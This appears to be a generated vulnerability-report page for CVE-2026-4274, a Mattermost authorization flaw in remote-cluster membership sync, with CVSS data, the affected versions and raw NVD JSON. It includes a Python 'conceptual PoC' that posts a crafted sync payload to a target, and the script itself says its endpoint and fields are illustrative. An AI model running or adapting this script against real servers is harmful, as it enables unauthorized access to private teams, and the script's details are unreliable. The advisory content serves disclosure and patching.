Security Vulnerability Report
CVE-2026-4274 CVSS 5.4 MEDIUM

CVE-2026-4274

Published: 2026-03-26 11:16:21
Last Modified: 2026-03-26 18:48:40

Description

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to restrict team-level access when processing membership sync from a remote cluster, which allows a malicious remote cluster to grant a user access to an entire private team instead of only the shared channel via sending crafted membership sync messages that trigger team membership assignment. Mattermost Advisory ID: MMSA-2026-00574

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE, versions 10.11.0 up to and including 10.11.10 (fixed in 10.11.11)
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE, versions 11.2.0 up to and including 11.2.2 (fixed in 11.2.3)
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE, versions 11.3.0 up to and including 11.3.1 (fixed in 11.3.2)
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE, versions 11.4.0 up to and including 11.4.0 (fixed in 11.4.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-4274
# This script demonstrates how a malicious cluster might send a crafted sync message.
# Note: Actual exploitation requires a valid cluster setup and acceptance by the target.
# The endpoint path and payload field names below are illustrative (the report labels
# this a conceptual PoC); they are not taken from a documented Mattermost API.
import json

import requests

TARGET_HOST = "https://target-mattermost.com"
API_ENDPOINT = f"{TARGET_HOST}/api/v4/cluster/sync_membership"

# Malicious payload crafted to grant full team access
payload = {
    "sender_cluster_id": "malicious-cluster-node",
    "user_id": "target_user_id",
    "team_id": "private_team_id_to_access",
    "channel_ids": [],  # Empty to imply full team sync or bypass channel restriction
    "action": "sync_membership",
}

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <CLUSTER_TOKEN>",  # Requires valid cluster token
}


def send_exploit():
    print(f"[*] Sending crafted membership sync to {TARGET_HOST}...")
    try:
        response = requests.post(
            API_ENDPOINT, data=json.dumps(payload), headers=headers, verify=False
        )
        if response.status_code == 200:
            print("[+] Sync request accepted. User may have been added to the private team.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    send_exploit()

References

https://mattermost.com/security-updates (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4274", "sourceIdentifier": "[email protected]", "published": "2026-03-26T11:16:21.257", "lastModified": "2026-03-26T18:48:39.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to restrict team-level access when processing membership sync from a remote cluster, which allows a malicious remote cluster to grant a user access to an entire private team instead of only the shared channel via sending crafted membership sync messages that trigger team membership assignment. Mattermost Advisory ID: MMSA-2026-00574"}, {"lang": "es", "value": "Versiones de Mattermost 11.2.x hasta 11.2.2, 10.11.x hasta 10.11.10, 11.4.x hasta 11.4.0, 11.3.x hasta 11.3.1 no restringen el acceso a nivel de equipo al procesar la sincronización de membresía desde un clúster remoto, lo que permite a un clúster remoto malicioso otorgar a un usuario acceso a un equipo privado completo en lugar de solo al canal compartido mediante el envío de mensajes de sincronización de membresía manipulados que desencadenan la asignación de membresía de equipo. ID de Aviso de Mattermost: MMSA-2026-00574"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.1", "matchCriteriaId": "839BC7B7-28DF-4125-937A-8B0D2D6893C2"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}